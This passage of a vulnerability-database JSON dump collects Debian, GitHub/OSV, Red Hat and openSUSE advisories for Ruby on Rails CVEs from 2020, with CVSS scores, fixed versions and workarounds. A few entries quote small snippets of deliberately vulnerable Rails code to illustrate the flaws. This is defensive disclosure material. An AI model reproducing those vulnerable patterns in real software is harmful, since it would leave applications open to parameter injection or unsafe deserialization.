["CVE-2020-15169"], "modified": "2023-05-04T20:13:31", "id": "OSV:GHSA-CFJV-5498-MPH5", "href": "https://osv.dev/vulnerability/GHSA-cfjv-5498-mph5", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-05T05:18:56", "description": "\nA potential Cross-Site Scripting (XSS) vulnerability was found in rails,\na ruby based MVC framework. Views that allow the user to control the\ndefault (not found) value of the `t` and `translate` helpers could be\nsusceptible to XSS attacks. When an HTML-unsafe string is passed as the\ndefault for a missing translation key named html or ending in \\_html, the\ndefault string is incorrectly marked as HTML-safe and not escaped.\n\n\nFor Debian 9 stretch, this problem has been fixed in version\n2:4.2.7.1-1+deb9u4.\n\n\nWe recommend that you upgrade your rails packages.\n\n\nFor the detailed security status of rails please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/rails>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-10-09T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2022-08-05T05:18:55", "id": "OSV:DLA-2403-1", "href": "https://osv.dev/vulnerability/DLA-2403-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-07-05T19:32:50", "description": "There is a vulnerability in ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user.\n\nVersions Affected: rails < 5.2.4.2, rails < 6.0.3.1\nNot affected: Applications that do not use the direct upload functionality of the ActiveStorage S3 adapter.\nFixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1\n\nImpact\n------\n\nUtilizing this vulnerability, an attacker can control the Content-Length of an S3 direct upload URL without receiving a new signature from the server. This could be used to bypass controls in place on the server to limit upload size.\n\nWorkarounds\n-----------\n\nThis is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-26T15:09:48", "type": "osv", "title": "Circumvention of file size limits in ActiveStorage", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2023-07-05T19:31:49", "id": "OSV:GHSA-M42X-37P3-FV5W", "href": "https://osv.dev/vulnerability/GHSA-m42x-37p3-fv5w", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-08T17:21:30", "description": "There is a strong parameters bypass vector in ActionPack.\n\nVersions Affected: rails <= 6.0.3\nNot affected: rails < 4.0.0\nFixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1\n\nImpact\n------\nIn some cases user supplied information can be inadvertently leaked from\nStrong Parameters. Specifically the return value of `each`, or `each_value`,\nor `each_pair` will return the underlying \"untrusted\" hash of data that was\nread from the parameters. Applications that use this return value may be\ninadvertently use untrusted user input.\n\nImpacted code will look something like this:\n\n```\ndef update\n # Attacker has included the parameter: `{ is_admin: true }`\n User.update(clean_up_params)\nend\n\ndef clean_up_params\n params.each { |k, v| SomeModel.check(v) if k == :name }\nend\n```\n\nNote the mistaken use of `each` in the `clean_up_params` method in the above\nexample.\n\nWorkarounds\n-----------\nDo not use the return values of `each`, `each_value`, or `each_pair` in your\napplication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-26T15:09:16", "type": "osv", "title": "Possible Strong Parameters Bypass in ActionPack", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2023-08-08T15:25:38", "id": "OSV:GHSA-8727-M6GJ-MC37", "href": "https://osv.dev/vulnerability/GHSA-8727-m6gj-mc37", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-08T17:23:05", "description": "It is possible to, given a global CSRF token such as the one present in the authenticity_token meta tag, forge a per-form CSRF token for any action for that session.\n\nImpact\n------\n\nGiven the ability to extract the global CSRF token, an attacker would be able to construct a per-form CSRF token for that session.\n\nWorkarounds\n-----------\n\nThis is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-05-26T15:11:13", "type": "osv", "title": "Ability to forge per-form CSRF tokens in Rails", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2023-08-08T15:42:18", "id": "OSV:GHSA-JP5V-5GX4-JMJ9", "href": "https://osv.dev/vulnerability/GHSA-jp5v-5gx4-jmj9", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-08T17:23:05", "description": "In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when\nuntrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result\nfrom the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like:\n\n```\ndata = cache.fetch(\"demo\", raw: true) { untrusted_string }\n```\nVersions Affected: rails < 5.2.5, rails < 6.0.4\nNot affected: Applications not using MemCacheStore or RedisCacheStore. Applications that do not use the `raw` option when storing untrusted user input.\nFixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1\n \nImpact\n------\nUnmarshalling of untrusted user input can have impact up to and including RCE. At a minimum,\nthis vulnerability allows an attacker to inject untrusted Ruby objects into a web application.\nIn addition to upgrading to the latest versions of Rails, developers should ensure that whenever\nthey are calling `Rails.cache.fetch` they are using consistent values of the `raw` parameter for both\nreading and writing, especially in the case of the RedisCacheStore which does not, prior to these changes,\ndetect if data was serialized using the raw option upon deserialization.\n\nWorkarounds\n-----------\nIt is recommended that application developers apply the suggested patch or upgrade to the latest release as\nsoon as possible. If this is not possible, we recommend ensuring that all user-provided strings cached using\nthe `raw` argument should be double-checked to ensure that they conform to the expected format.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-26T14:49:24", "type": "osv", "title": "ActiveSupport potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2023-08-08T16:30:55", "id": "OSV:GHSA-2P68-F74V-9WC6", "href": "https://osv.dev/vulnerability/GHSA-2p68-f74v-9wc6", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-08T17:21:01", "description": "There is a vulnerability in rails-ujs that allows attackers to send CSRF tokens to wrong domains.\n\nVersions Affected: rails <= 6.0.3\nNot affected: Applications which don't use rails-ujs.\nFixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1\n\nImpact\n------\n\nThis is a regression of CVE-2015-1840.\n\nIn the scenario where an attacker might be able to control the href attribute of an anchor tag or the action attribute of a form tag that will trigger a POST action, the attacker can set the href or action to a cross-origin URL, and the CSRF token will be sent.\n\nWorkarounds\n-----------\n\nTo work around this problem, change code that allows users to control the href attribute of an anchor tag or the action attribute of a form tag to filter the user parameters.\n\nFor example, code like this:\n\n link_to params\n\nto code like this:\n\n link_to filtered_params\n\n def filtered_params\n # Filter just the parameters that you trust\n end", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-07-07T16:34:10", "type": "osv", "title": "CSRF Vulnerability in rails-ujs", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1840", "CVE-2020-8167"], "modified": "2023-08-08T15:30:59", "id": "OSV:GHSA-XQ5J-GW7F-JGJ8", "href": "https://osv.dev/vulnerability/GHSA-xq5j-gw7f-jgj8", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2023-09-12T04:36:23", "description": "Red Hat Satellite is a systems management tool for Linux-based\ninfrastructure. It allows for provisioning, remote management, and\nmonitoring of multiple Linux deployments with a single centralized tool.\n\nSecurity Fix(es):\n\n* foreman: Managing repositories with their id via hammer does not respect the role filters (CVE-2017-2662)\n* python-psutil: Double free because of refcount mishandling (CVE-2019-18874)\n* candlepin: netty: compression/decompression codecs don't enforce limits on buffer allocation sizes (CVE-2020-11612)\n* foreman: world-readable OMAPI secret through the ISC DHCP server (CVE-2020-14335)\n* candlepin: resteasy-client: potential sensitive information leakage in JAX-RS RESTEasy Client's WebApplicationException handling (CVE-2020-25633)\n* python-django: potential SQL injection via \"tolerance\" parameter in GIS functions and aggregates on Oracle (CVE-2020-9402)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nAdditional Changes:\n\n* Usability enhancements to Red Hat's Simple Content Access mode and Satellite\n\n* Usability improvements to enabling Remote Execution on your hosts.\n\n* Notifications in the UI to warn users when subscriptions are expiring.\n\n* Usability enhancements to enable Insights integration with Satellite.\n\n* Performance improvements to various aspects of the user interface and API.\n\n* Added support for OpenID Connect for authentication.\n\n* Usability improvements to the Satellite Installer.\n\n* Updated Ruby web server to the modern Puma application server which replaces Passenger.\n\nThe items above are not a complete list of changes. This update also fixes\nseveral bugs and adds various enhancements. Documentation for these changes\nis available from the Release Notes document linked to in the References\nsection.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-21T12:43:38", "type": "redhat", "title": "(RHSA-2021:1313) Moderate: Satellite 6.9 Release", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1820", "CVE-2015-3448", "CVE-2017-2662", "CVE-2018-1000119", "CVE-2019-16782", "CVE-2019-18874", "CVE-2020-11612", "CVE-2020-14335", "CVE-2020-15169", "CVE-2020-25633", "CVE-2020-8162", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8185", "CVE-2020-9402"], "modified": "2021-05-07T18:18:28", "id": "RHSA-2021:1313", "href": "https://access.redhat.com/errata/RHSA-2021:1313", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2022-11-06T17:59:05", "description": "An update that fixes 16 vulnerabilities is now available.\n\nDescription:\n\n This update for rmt-server fixes the following issues:\n\n Update to version 2.6.5:\n - Solved potential bug of SCC repository URLs changing over time. RMT now\n self heals by removing the previous invalid repository and creating the\n correct one.\n - Add web server settings to /etc/rmt.conf: Now it's possible to configure\n the minimum and maximum threads count as well the number of web server\n workers to be booted through /etc/rmt.conf.\n - Instead of using an MD5 of URLs for custom repository friendly_ids, RMT\n now builds an ID from the name.\n - Fix RMT file caching based on timestamps: Previously, RMT sent GET\n requests with the header 'If-Modified-Since' to a repository server and\n if the response had a 304 (Not Modified), it would copy a file from the\n local cache instead of downloading. However, if the local file timestamp\n accidentally changed to a date newer than the one on the repository\n server, RMT would have an outdated file, which caused some errors. Now,\n RMT makes HEAD requests to the repositories servers and inspect the\n 'Last-Modified' header to decide whether to download a file or copy it\n from cache, by comparing the equalness of timestamps.\n - Fixed an issue where relative paths supplied to `rmt-cli import repos`\n caused the command to fail.\n - Friendlier IDs for custom repositories: In an effort to simplify the\n handling of SCC and custom repositories, RMT now has friendly IDs. For\n SCC repositories, it's the same SCC ID as before. For custom\n repositories, it can either be user provided\n or RMT generated (MD5 of the provided URL). Benefits:\n * `rmt-cli mirror repositories` now works for custom repositories.\n * Custom repository IDs can be the same across RMT instances.\n * No more confusing \"SCC ID\" vs \"ID\" in `rmt-cli` output. Deprecation\n Warnings:\n * RMT now uses a different ID for custom repositories than before. RMT\n still supports that old ID, but it's recommended to start using the\n new ID to ensure future compatibility.\n - Updated rails and puma dependencies for security fixes.\n\n This update was imported from the SUSE:SLE-15-SP2:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2020-1993=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-21T00:00:00", "type": "suse", "title": "Security update for rmt-server (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16770", "CVE-2019-5418", "CVE-2019-5419", "CVE-2019-5420", "CVE-2020-11076", "CVE-2020-11077", "CVE-2020-15169", "CVE-2020-5247", "CVE-2020-5249", "CVE-2020-5267", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8184", "CVE-2020-8185"], "modified": "2020-11-21T00:00:00", "id": "OPENSUSE-SU-2020:1993-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/2W26GJJ7QXIADWB6ZCQWC2BUZD2ALYVT/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-04-18T12:40:55", "description": "An update that fixes 16 vulnerabilities is now available.\n\nDescription:\n\n This update for rmt-server fixes the following issues:\n\n - Version 2.6.5\n - Solved potential bug of SCC repository URLs changing over time. RMT now\n self heals by removing the previous invalid repository and creating the\n correct one.\n\n - Version 2.6.4\n - Add web server settings to /etc/rmt.conf: Now it's possible to configure\n the minimum and maximum threads count as well the number of web server\n workers to be booted through /etc/rmt.conf.\n\n - Version 2.6.3\n - Instead of using an MD5 of URLs for custom repository friendly_ids, RMT\n now builds an ID from the name.\n\n - Version 2.6.2\n - Fix RMT file caching based on timestamps: Previously, RMT sent GET\n requests with the header 'If-Modified-Since' to a repository server and\n if the response had a 304 (Not Modified), it would copy a file from the\n local cache instead of downloading. However, if the local file timestamp\n accidentally changed to a date newer than the one on the repository\n server, RMT would have an outdated file, which caused some errors. Now,\n RMT makes HEAD requests to the repositories servers and inspect the\n 'Last-Modified' header to decide whether to download a file or copy it\n from cache, by comparing the equalness of timestamps.\n\n\n - Version 2.6.1\n - Fixed an issue where relative paths supplied to `rmt-cli import repos`\n caused the command to fail.\n\n - Version 2.6.0\n - Friendlier IDs for custom repositories: In an effort to simplify the\n handling of SCC and custom repositories, RMT now has friendly IDs. For\n SCC repositories, it's the same SCC ID as before. For custom\n repositories, it can either be user provided\n or RMT generated (MD5 of the provided URL). Benefits:\n * `rmt-cli mirror repositories` now works for custom repositories.\n * Custom repository IDs can be the same across RMT instances.\n * No more confusing \"SCC ID\" vs \"ID\" in `rmt-cli` output. Deprecation\n Warnings:\n * RMT now uses a different ID for custom repositories than before. RMT\n still supports that old ID, but it's recommended to start using the\n new ID to ensure future compatibility.\n\n - Version 2.5.20\n - Updated rails from 6.0.3.2 to 6.0.3.3:\n - actionview (CVE-2020-15169)\n\n - Version 2.5.19\n - RMT now has the ability to remove local systems with the command\n `rmt-cli systems remove`.\n\n - Version 2.5.18\n - Fixed exit code for `rmt-cli mirror` and its subcommands. Now it exits\n with 1 whenever an error occurs during mirroring\n - Improved message logging for `rtm-cli mirror`. Instead of logging an\n error when it occurs, the command summarize all errors at the end of\n execution. Now log messages have colors to better identify\n failure/success.\n\n - Version 2.5.17\n - RMT no longer provides the installer updates repository to systems via\n its zypper service. This repository is used during the installation\n process, as it provides an up-to-date installation experience, but it\n has no use on an already installed system.\n\n - Version 2.5.16\n - Updated RMT's rails and puma dependencies.\n - puma (CVE-2020-11076, CVE-2020-11077, CVE-2020-5249, CVE-2020-5247\n CVE-2019-16770)\n - actionpack (CVE-2020-8185, CVE-2020-8164, CVE-2020-8166)\n - actionview (CVE-2020-8167, CVE-2020-5267, CVE-2019-5418, CVE-2019-5419)\n - activesupport (CVE-2020-8165)\n - railties (CVE-2019-5420)\n\n - Version 2.5.15\n - RMT now checks if repositories are fully mirrored during the activation\n process. Previously, RMT only checked if the repositories were enabled\n to be mirrored, but not that they were actually mirrored. In this case,\n RMTs were not able to provide the repository data which systems assumed\n it had.\n\n - Version 2.5.14\n - Enable 'Installer-Updates' repositories by default\n\n - Fixed deprecation warning when thor encountered an error. Also, instead\n of returning 0 for thor errors, rmt-cli will return 1 instead.\n\n - Version 2.5.13\n - Added `rmt-cli repos clean` command to remove locally mirrored files\n of repositories which are not marked to be mirrored.\n - Previously, RMT didn't track deduplicated files in its database. Now, to\n accommodate `rmt-cli repos clean`, RMT will track all mirrored files.\n\n - Move the nginx reload to the configuration package which contain nginx\n config files, don't reload nginx unconditionally from main package.\n\n - Version 2.5.12\n - Update rack to version 2.2.3 (CVE-2020-8184: bsc#1173351)\n - Update Rails to version 5.2.4.3:\n - actionpack (CVE-2020-8164: bsc#1172177)\n - actionpack (CVE-2020-8166: bsc#1172182)\n - activesupport (CVE-2020-8165: bsc#1172186)\n - actionview (CVE-2020-8167: bsc#1172184)\n\n - Version 2.5.11\n - rmt-server-pubcloud:\n - SLES11 EOL\n - Extension activation verification based on the available subscriptions\n - Added a manual instance verification script\n\n - Version 2.5.10\n - Support rmt-server to run with Ruby 2.7 (Factory/Tumbleweed):\n - Bump gem 'config' version from 1.7.2 to 2.2.1 to fix incompatibility\n Ruby 2.7 OpenStruct class;\n - Bump gem 'typhoeus' version from 1.3.1 to 1.4.0 in order to also bump\n gem 'ethon' version, which caused a 'rb_safe_level' warning on Ruby\n 2.7;\n - Fix \"last arg as keyword arg\" Ruby 2.7 warning on source code;\n - Disable \"deprecated\" warnings from Ruby 2.7; Rails 5.1 generates a lot\n of warnings with Ruby 2.7, mainly due to \"capturing the given block\n with Proc.new\", which is deprecated;\n - Improve RPM spec to consider only the distribution default Ruby\n version configured in OBS;\n - Improve RPM spec to remove Ruby 2.7 warnings regarding 'bundler.\n\n - Move nginx/vhosts.d directory to correct sub-package. They are needed\n together with nginx, not rmt-server.\n - Fix dependencies especially for containerized usage:\n - mariadb and nginx are not hard requires, could run on another host\n - Fix generic dependencies:\n - systemd ordering was missing\n - shadow is required for pre-install\n\n - Version 2.5.9\n - rmt-server-pubcloud: enforce strict authentication\n\n - Version 2.5.8\n - Use repomd_parser gem to remove repository metadata parsing code.\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-2000=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-23T00:00:00", "type": "suse", "title": "Security update for rmt-server (important)", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16770", "CVE-2019-5418", "CVE-2019-5419", "CVE-2019-5420", "CVE-2020-11076", "CVE-2020-11077", "CVE-2020-15169", "CVE-2020-5247", "CVE-2020-5249", "CVE-2020-5267", "CVE-2020-8164", "CVE-2020-8165", "CVE-2020-8166", "CVE-2020-8167", "CVE-2020-8184", "CVE-2020-8185"], "modified": "2020-11-23T00:00:00", "id": "OPENSUSE-SU-2020:2000-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/7MCDUWQEXA3XGI7X2XPATA7YTNVDYTSF/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-11-10T08:10:50", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for rubygem-actionpack-5_1 fixes the following issues:\n\n - CVE-2020-8164: Possible Strong Parameters Bypass in ActionPack. There is\n a strong parameters bypass vector in ActionPack. (bsc#1172177)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2020-1533=1", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-09-26T00:00:00", "type": "suse", "title": "Security update for rubygem-actionpack-5_1 (important)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2020-09-26T00:00:00", "id": "OPENSUSE-SU-2020:1533-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/YAGJKTI3HWBTO3LRFKJMAOSFK2HM6CLR/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-11-09T12:09:46", "description": "An update that fixes one vulnerability is now available.\n\nDescription:\n\n This update for rubygem-activesupport-5_1 fixes the following issues:\n\n - CVE-2020-8165: Fixed deserialization of untrusted data in MemCacheStore\n potentially resulting in remote code execution (bsc#1172186)\n\n This update was imported 